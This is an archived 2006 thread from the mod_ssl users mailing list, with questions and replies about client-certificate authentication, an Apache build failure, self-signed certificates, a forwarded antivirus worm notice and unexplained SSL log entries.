This is a multi-part message in MIME format.

------_=_NextPart_001_01C70E1B.19CE8406
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi, I'm trying to do the following. When users from the Intranet access
to the website nothing will be required but if the users come from the
Internet a client certificate will be required to use it with the basic
authentication using the FakeBasicAuth option. I did what the link
http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10 says but if I come
from the Intranet a client certificate is required (if cancel it I get
access to the webste) and if I come from the Internet a login box pops
up. =20

Could you help me?


------_=_NextPart_001_01C70E1B.19CE8406
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi, I’m
trying to do the following. When users from the Intranet access to the =
website
nothing will be required but if the users come from the Internet a =
client
certificate will be required to use it with the basic authentication =
using the
FakeBasicAuth option. I did what the link http://www.m=
odssl.org/docs/2.8/ssl_howto.html#ToC10
says but if I come from the Intranet a client certificate is required =
(if cancel
it I get access to the webste) and if I come from the Internet a login =
box pops
up.  



Could
you help me?









------_=_NextPart_001_01C70E1B.19CE8406--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 22 23:40:24 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A0FBB14D8AB; Wed, 22 Nov 2006 23:40:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nikola.com (nikola.com [64.146.180.228])
	by master.modssl.org (Postfix) with ESMTP id 15C5C14D835
	for ; Wed, 22 Nov 2006 23:40:23 +0100 (CET)
Received: from printserver by nikola.com
	(MDaemon PRO v9.5.3)
	with ESMTP id md50001027516.msg
	for ; Wed, 22 Nov 2006 14:40:04 -0800
Message-ID: <011101c70e87$267564b0$5e00800a@printserver>
From: "Jesse Gordon" 
To: 
Subject: modssl setp-by-step installation won't compile
Date: Wed, 22 Nov 2006 14:40:02 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.3790.2663
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2757
X-Authenticated-Sender: jesseg@nikola.com
X-Spam-Processed: nikola.com, Wed, 22 Nov 2006 14:40:04 -0800
	(not processed: message from valid local sender)
X-MDRemoteIP: 10.0.0.8
X-Return-Path: jesseg@nikola.com
X-Envelope-From: jesseg@nikola.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: nikola.com, Wed, 22 Nov 2006 14:40:05 -0800
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jesse Gordon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

This is my first post. I am trying to get modssl to work by carefully 
following the directions at:
http://www.modssl.org/example/
but I get the following errors when I try to perform a make in apache.
I'm using all the exact versions of the specified programs.
It must be that one of my libs is too old or too new but one of the 
configure scripts isn't checking it.

I'm new to working with ssl and would greatly apreciate any suggestions.

The command which failed is the 'make' in step 3 "Build and install the 
SSL-aware Apache" on the above referenced example page.

Note that if I reconfigure apache with ./configure --disable-module=ssl then 
it compiles just fine -- but of course then I don't have ssl support. (This 
command is of course not in the example, but I tried it after the example 
failed in order to test.)

Thanks!

-Jesse


<=== src/modules/ssl
<=== src/modules
gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
 -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` modules.c
gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
 -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` buildmark.c
gcc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED 
`./apaci` -L/usr/src/testmodssl/openssl-0.9.8b   \
      -o httpd buildmark.o modules.o modules/standard/libstandard.a 
modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a 
regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lexpat
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x35): In 
function `dlfcn_load':
: undefined reference to `dlopen'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x95): In 
function `dlfcn_load':
: undefined reference to `dlclose'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0xbc): In 
function `dlfcn_load':
: undefined reference to `dlerror'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x147): In 
function `dlfcn_bind_var':
: undefined reference to `dlsym'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x172): In 
function `dlfcn_bind_var':
: undefined reference to `dlerror'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x237): In 
function `dlfcn_bind_func':
: undefined reference to `dlsym'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x262): In 
function `dlfcn_bind_func':
: undefined reference to `dlerror'
/usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x50b): In 
function `dlfcn_unload':
: undefined reference to `dlclose'
collect2: ld returned 1 exit status
make[2]: *** [target_static] Error 1
make[2]: Leaving directory `/usr/src/testmodssl/apache_1.3.37/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/usr/src/testmodssl/apache_1.3.37'
make: *** [build] Error 2
root@reports:/usr/src/testmodssl/apache_1.3.37#


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 23 04:58:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C513314D880; Thu, 23 Nov 2006 04:58:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nikola.com (nikola.com [64.146.180.228])
	by master.modssl.org (Postfix) with ESMTP id A3AB614D84D
	for ; Thu, 23 Nov 2006 04:58:00 +0100 (CET)
Received: from printserver by nikola.com
	(MDaemon PRO v9.5.3)
	with ESMTP id md50001027884.msg
	for ; Wed, 22 Nov 2006 19:57:40 -0800
Message-ID: <000e01c70eb3$83df41d0$5e00800a@printserver>
From: "Jesse Gordon" 
To: 
References: <011101c70e87$267564b0$5e00800a@printserver>
Subject: Re: modssl setp-by-step installation won't compile
Date: Wed, 22 Nov 2006 19:57:37 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=response
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.3790.2663
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2757
X-Authenticated-Sender: jesseg@nikola.com
X-Spam-Processed: nikola.com, Wed, 22 Nov 2006 19:57:40 -0800
	(not processed: message from valid local sender)
X-MDRemoteIP: 10.0.0.8
X-Return-Path: jesseg@nikola.com
X-Envelope-From: jesseg@nikola.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: nikola.com, Wed, 22 Nov 2006 19:57:42 -0800
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jesse Gordon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just disregard my complaint about apache not compiling, please.

I gave up. All I needed anyway was the scripts for making self signed 
certificates for learning and such.

I found a tutorial on the web which tells how to make a self signed CA root 
certificate which can then sign certificate singing requests for other 
domains -- but the company name must always be the same.

But the snakeoil demo that comes with apache does a similar thing, except 
the 'issued to' and 'issued by' company names are different -- but I can't 
figure out how to change the snakeoil company name.

Could someone please point me to a tutorial which demonstrates this?

Yeah, yeah, I know that in order for my ssl site to be automatically 
accepted by all browsers I must pay verisign or godaddy or whatnot -- but I 
just want to learn how it all works. I don't care if my viewers get popups 
and the like. They are few and can, if they wish, install my certificate so 
their browsers stop complaining.

Thanks very much!

-Jesse

An old linux user but a new modssl user.



----- Original Message ----- 
From: "Jesse Gordon" 
To: 
Sent: Wednesday, November 22, 2006 2:40 PM
Subject: modssl setp-by-step installation won't compile


> Hello,
>
> This is my first post. I am trying to get modssl to work by carefully 
> following the directions at:
> http://www.modssl.org/example/
> but I get the following errors when I try to perform a make in apache.
> I'm using all the exact versions of the specified programs.
> It must be that one of my libs is too old or too new but one of the 
> configure scripts isn't checking it.
>
> I'm new to working with ssl and would greatly apreciate any suggestions.
>
> The command which failed is the 'make' in step 3 "Build and install the 
> SSL-aware Apache" on the above referenced example page.
>
> Note that if I reconfigure apache with ./configure --disable-module=ssl 
> then it compiles just fine -- but of course then I don't have ssl support. 
> (This command is of course not in the example, but I tried it after the 
> example failed in order to test.)
>
> Thanks!
>
> -Jesse
>
>
> <=== src/modules/ssl
> <=== src/modules
> gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
>  -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` modules.c
> gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
>  -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` buildmark.c
> gcc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 -DUSE_HSREGEX -DEAPI  
> -DNO_DL_NEEDED `./apaci` -L/usr/src/testmodssl/openssl-0.9.8b   \
>      -o httpd buildmark.o modules.o modules/standard/libstandard.a 
> modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a 
> regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lexpat
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x35): 
> In function `dlfcn_load':
> : undefined reference to `dlopen'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x95): 
> In function `dlfcn_load':
> : undefined reference to `dlclose'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0xbc): 
> In function `dlfcn_load':
> : undefined reference to `dlerror'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x147): 
> In function `dlfcn_bind_var':
> : undefined reference to `dlsym'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x172): 
> In function `dlfcn_bind_var':
> : undefined reference to `dlerror'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x237): 
> In function `dlfcn_bind_func':
> : undefined reference to `dlsym'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x262): 
> In function `dlfcn_bind_func':
> : undefined reference to `dlerror'
> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x50b): 
> In function `dlfcn_unload':
> : undefined reference to `dlclose'
> collect2: ld returned 1 exit status
> make[2]: *** [target_static] Error 1
> make[2]: Leaving directory `/usr/src/testmodssl/apache_1.3.37/src'
> make[1]: *** [build-std] Error 2
> make[1]: Leaving directory `/usr/src/testmodssl/apache_1.3.37'
> make: *** [build] Error 2
> root@reports:/usr/src/testmodssl/apache_1.3.37#
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 23 08:47:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3694114D882; Thu, 23 Nov 2006 08:47:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nikola.com (nikola.com [64.146.180.228])
	by master.modssl.org (Postfix) with ESMTP id 17F4014D84D
	for ; Thu, 23 Nov 2006 08:47:06 +0100 (CET)
Received: from printserver by nikola.com
	(MDaemon PRO v9.5.3)
	with ESMTP id md50001028033.msg
	for ; Wed, 22 Nov 2006 23:46:47 -0800
Message-ID: <001101c70ed3$8626b340$5e00800a@printserver>
From: "Jesse Gordon" 
To: 
References: <011101c70e87$267564b0$5e00800a@printserver> <000e01c70eb3$83df41d0$5e00800a@printserver>
Subject: Re: modssl setp-by-step installation won't compile -- all happy now
Date: Wed, 22 Nov 2006 23:46:45 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=response
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.3790.2663
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2757
X-Authenticated-Sender: jesseg@nikola.com
X-Spam-Processed: nikola.com, Wed, 22 Nov 2006 23:46:47 -0800
	(not processed: message from valid local sender)
X-MDRemoteIP: 10.0.0.8
X-Return-Path: jesseg@nikola.com
X-Envelope-From: jesseg@nikola.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: nikola.com, Wed, 22 Nov 2006 23:46:47 -0800
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jesse Gordon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I solved second problem too.

I found this great site here:

http://iain.cx/ssl/?openssl

which explained exactly what I wanted to know!

Thanks!

-Jesse

----- Original Message ----- 
From: "Jesse Gordon" 
To: 
Sent: Wednesday, November 22, 2006 7:57 PM
Subject: Re: modssl setp-by-step installation won't compile


> Just disregard my complaint about apache not compiling, please.
>
> I gave up. All I needed anyway was the scripts for making self signed 
> certificates for learning and such.
>
> I found a tutorial on the web which tells how to make a self signed CA 
> root certificate which can then sign certificate singing requests for 
> other domains -- but the company name must always be the same.
>
> But the snakeoil demo that comes with apache does a similar thing, except 
> the 'issued to' and 'issued by' company names are different -- but I can't 
> figure out how to change the snakeoil company name.
>
> Could someone please point me to a tutorial which demonstrates this?
>
> Yeah, yeah, I know that in order for my ssl site to be automatically 
> accepted by all browsers I must pay verisign or godaddy or whatnot -- but 
> I just want to learn how it all works. I don't care if my viewers get 
> popups and the like. They are few and can, if they wish, install my 
> certificate so their browsers stop complaining.
>
> Thanks very much!
>
> -Jesse
>
> An old linux user but a new modssl user.
>
>
>
> ----- Original Message ----- 
> From: "Jesse Gordon" 
> To: 
> Sent: Wednesday, November 22, 2006 2:40 PM
> Subject: modssl setp-by-step installation won't compile
>
>
>> Hello,
>>
>> This is my first post. I am trying to get modssl to work by carefully 
>> following the directions at:
>> http://www.modssl.org/example/
>> but I get the following errors when I try to perform a make in apache.
>> I'm using all the exact versions of the specified programs.
>> It must be that one of my libs is too old or too new but one of the 
>> configure scripts isn't checking it.
>>
>> I'm new to working with ssl and would greatly apreciate any suggestions.
>>
>> The command which failed is the 'make' in step 3 "Build and install the 
>> SSL-aware Apache" on the above referenced example page.
>>
>> Note that if I reconfigure apache with ./configure --disable-module=ssl 
>> then it compiles just fine -- but of course then I don't have ssl 
>> support. (This command is of course not in the example, but I tried it 
>> after the example failed in order to test.)
>>
>> Thanks!
>>
>> -Jesse
>>
>>
>> <=== src/modules/ssl
>> <=== src/modules
>> gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
>>  -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` modules.c
>> gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 
>>  -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED `./apaci` buildmark.c
>> 
>> cc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208128 -DUSE_HSREGEX -DEAPI  
>>  -DNO_DL_NEEDED `./apaci` -L/usr/src/testmodssl/openssl-0.9.8b   \
>>      -o httpd buildmark.o modules.o modules/standard/libstandard.a 
>> modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a 
>> regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lexpat
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x35): 
>> In function `dlfcn_load':
>> : undefined reference to `dlopen'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x95): 
>> In function `dlfcn_load':
>> : undefined reference to `dlclose'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0xbc): 
>> In function `dlfcn_load':
>> : undefined reference to `dlerror'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x147): 
>> In function `dlfcn_bind_var':
>> : undefined reference to `dlsym'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x172): 
>> In function `dlfcn_bind_var':
>> : undefined reference to `dlerror'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x237): 
>> In function `dlfcn_bind_func':
>> : undefined reference to `dlsym'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x262): 
>> In function `dlfcn_bind_func':
>> : undefined reference to `dlerror'
>> /usr/src/testmodssl/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x50b): 
>> In function `dlfcn_unload':
>> : undefined reference to `dlclose'
>> collect2: ld returned 1 exit status
>> make[2]: *** [target_static] Error 1
>> make[2]: Leaving directory `/usr/src/testmodssl/apache_1.3.37/src'
>> make[1]: *** [build-std] Error 2
>> make[1]: Leaving directory `/usr/src/testmodssl/apache_1.3.37'
>> make: *** [build] Error 2
>> root@reports:/usr/src/testmodssl/apache_1.3.37#
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 25 05:17:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 10AB614D886; Sat, 25 Nov 2006 05:17:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.201])
	by master.modssl.org (Postfix) with ESMTP id DB4ED14D82C
	for ; Sat, 25 Nov 2006 05:17:01 +0100 (CET)
Received: by nz-out-0102.google.com with SMTP id o37so608858nzf
        for ; Fri, 24 Nov 2006 20:16:39 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=iUfybDAQttU7/2vREsK8p4DRhkrW7eC8Y/HmDbxOTgabL7s8nUhuWwDwFGeIU0OBa5CH6285FjgY6ufeyzFlXFN2pfesr2tvV6nJE7owSKoq+nzzOsuP+IvChTkt8uFfG7cs8qiaaHFAqW/1hdO8AI+HsuGn219R/khnTJdb750=
Received: by 10.65.59.19 with SMTP id m19mr17728473qbk.1164428199626;
        Fri, 24 Nov 2006 20:16:39 -0800 (PST)
Received: by 10.65.234.8 with HTTP; Fri, 24 Nov 2006 20:16:39 -0800 (PST)
Message-ID: <740f716a0611242016u6e83906ekbe1a525201af1806@mail.gmail.com>
Date: Fri, 24 Nov 2006 20:16:39 -0800
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: About FakeBasicAuth
In-Reply-To: <0F56DC121ABBE641A2E5958282B6A07401A9A9D6@IUSEXCHHV01.justicia.junta-andalucia.es>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_68375_13569158.1164428199507"
References: <0F56DC121ABBE641A2E5958282B6A07401A9A9D6@IUSEXCHHV01.justicia.junta-andalucia.es>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_68375_13569158.1164428199507
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

That seems like an odd way of doing it. Seems more like an apache issue then
anything as this can be achieved with apache's included modules (like
mod_auth and mod_access).

Something like


ServerName example.com
DocumentRoot /great/example/here


Order Allow, Deny
Deny from All
Allow from IP (like 192.168.1 or 192.168 etc)
AuthType Basic
AuthName "Example"
AuthUserFile /path/to/your/htpasswd/file
Satisfy Any




You could easily just change the port to 443 and add the necessary SSL info
to have this work on a SSL'd host.

On 11/22/06, Luis Carlos Peinado Bravo 
wrote:
>
>  Hi, I'm trying to do the following. When users from the Intranet access
> to the website nothing will be required but if the users come from the
> Internet a client certificate will be required to use it with the basic
> authentication using the FakeBasicAuth option. I did what the link
> http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10 says but if I come
> from the Intranet a client certificate is required (if cancel it I get
> access to the webste) and if I come from the Internet a login box pops up.
>
> Could you help me?
>

------=_Part_68375_13569158.1164428199507
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

That seems like an odd way of doing it. Seems more like an apache issue then anything as this can be achieved with apache's included modules (like mod_auth and mod_access).

Something like 

<VirtualHost 
192.168.1.1:80>
ServerName example.com
DocumentRoot /great/example/here

<Directory /great/example/here>
Order Allow, Deny
Deny from All
Allow from IP (like 
192.168.1 or 192.168 etc)
AuthType Basic
AuthName "Example"
AuthUserFile /path/to/your/htpasswd/file
Satisfy Any
</Directory>

</VirtualHost>

You could easily just change the port to 443 and add the necessary SSL info to have this work on a SSL'd host. 


On 11/22/06, Luis Carlos Peinado Bravo <lcarlos.peinado@juntadeandalucia.es> wrote:

















Hi, I'm
trying to do the following. When users from the Intranet access to the website
nothing will be required but if the users come from the Internet a client
certificate will be required to use it with the basic authentication using the
FakeBasicAuth option. I did what the link http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10

says but if I come from the Intranet a client certificate is required (if cancel
it I get access to the webste) and if I come from the Internet a login box pops
up.  



Could
you help me?














------=_Part_68375_13569158.1164428199507--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 28 18:56:17 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 236B614D88A; Tue, 28 Nov 2006 18:56:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fmmailgate02.web.de (fmmailgate02.web.de [217.72.192.227])
	by master.modssl.org (Postfix) with ESMTP id D5FF414D82F
	for ; Tue, 28 Nov 2006 18:56:14 +0100 (CET)
Received: from smtp06.web.de (fmsmtp06.dlan.cinetic.de [172.20.5.172])
	by fmmailgate02.web.de (Postfix) with ESMTP id CDBE53E5DE91
	for ; Tue, 28 Nov 2006 18:55:54 +0100 (CET)
Received: from [85.16.193.186] (helo=[85.16.193.186])
	by smtp06.web.de with asmtp (WEB.DE 4.107 #114)
	id 1Gp7BS-0001Hc-00
	for modssl-users@modssl.org; Tue, 28 Nov 2006 18:55:54 +0100
Message-ID: <456C7DA3.70500@web.de>
Date: Tue, 28 Nov 2006 19:19:15 +0100
From: Hendrik Meinert 
User-Agent: Thunderbird 1.5.0.8 (X11/20061025)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Spamed?
References: <20061110130346.EBCB614D89F@master.modssl.org>
In-Reply-To: <20061110130346.EBCB614D89F@master.modssl.org>
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Sender: hendrik.meinert@web.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hendrik Meinert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users




  
  


rse@engelschall.com schrieb:


  
  
+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: [list_ed.zip][document.txt                                                                   .exe]
W32/Netsky.P.worm

The file has been deleted to protect the network.
10/11/2006 14:01:00 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+
  

  

I have visited this website and I found you in the spammer list. Is that true?

  



I think this perhaps COULD be a virus, in order to message. I"m not
sure it is a fake virus scanner notice. Anyway, the message avove COULD
be a spam message. I am very un-sure about this, so I am pleased about
every answer, that could help me.



    Hendrik



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 30 04:05:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9F50A14D898; Thu, 30 Nov 2006 04:05:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from polymer3.scphys.kyoto-u.ac.jp (polymer3.scphys.kyoto-u.ac.jp [130.54.55.55])
	by master.modssl.org (Postfix) with ESMTP id 82D9414D850
	for ; Thu, 30 Nov 2006 04:05:30 +0100 (CET)
Received: from POLYMER5.scphys.kyoto-u.ac.jp (h118.65.226.10.32118.vlan.kuins.net [10.226.65.118])
	by polymer3.scphys.kyoto-u.ac.jp (8.13.8/8.13.8/20060227-1) with SMTP id kAU35578059823;
	Thu, 30 Nov 2006 12:05:06 +0900 (JST)
	(envelope-from turutani@scphys.kyoto-u.ac.jp)
Message-Id: <200611300305.AA00270@POLYMER5.scphys.kyoto-u.ac.jp>
From: Tsurutani Naoki 
Date: Thu, 30 Nov 2006 12:05:05 +0900
To: modssl-users@modssl.org
Subject: SSL access from my apache.
MIME-Version: 1.0
X-Mailer: AL-Mail32 Version 1.13
Content-Type: text/plain; charset=us-ascii
X-Spam-Status: No, score=-3.1 required=7.0 tests=ALL_TRUSTED,AWL,BAYES_20 
	autolearn=ham version=3.1.7
X-Spam-Checker-Version: SpamAssassin 3.1.7 (2006-10-05) on 
	polymer3.scphys.kyoto-u.ac.jp
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tsurutani Naoki 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have a question about ssl_engine_io.c.
On my system of FreeBSD 6-STABLE, apache with following signature is working :
	"Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.4
	 with Suhosin-Patch configured".
I found some log entries like
	localhost - - [29/Nov/2006:09:54:01 +0900] "GET /" 400 653 "-" "-"
	localhost - - [29/Nov/2006:09:54:02 +0900] "GET /" 400 653 "-" "-"
	localhost - - [29/Nov/2006:09:54:03 +0900] "GET /" 400 653 "-" "-"
	localhost - - [29/Nov/2006:10:43:04 +0900] "GET /" 400 653 "-" "-"
in my log file about ssl access. These entries are not found in normal http access log.
This is caused by ssl_io_filter_disable() function in modules/ssl/ssl_engine_io.c,
as I think, and I have no idea why these accesses are necessary.
Referencing to http access log, many accesses are found just before this log's timestamp,
but they were not about ssl (I checked firewall log and found no entries about tcp/443).
These logs were not found with apache-2.0.x before 1 year ago.

I want to know why this access occures.
Please tell me.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 30 21:55:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0AC0F14D8AA; Thu, 30 Nov 2006 21:55:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hades.smop.co.uk (smop.co.uk [81.5.177.201])
	by master.modssl.org (Postfix) with ESMTP id A458E14D82F
	for ; Thu, 30 Nov 2006 21:55:45 +0100 (CET)
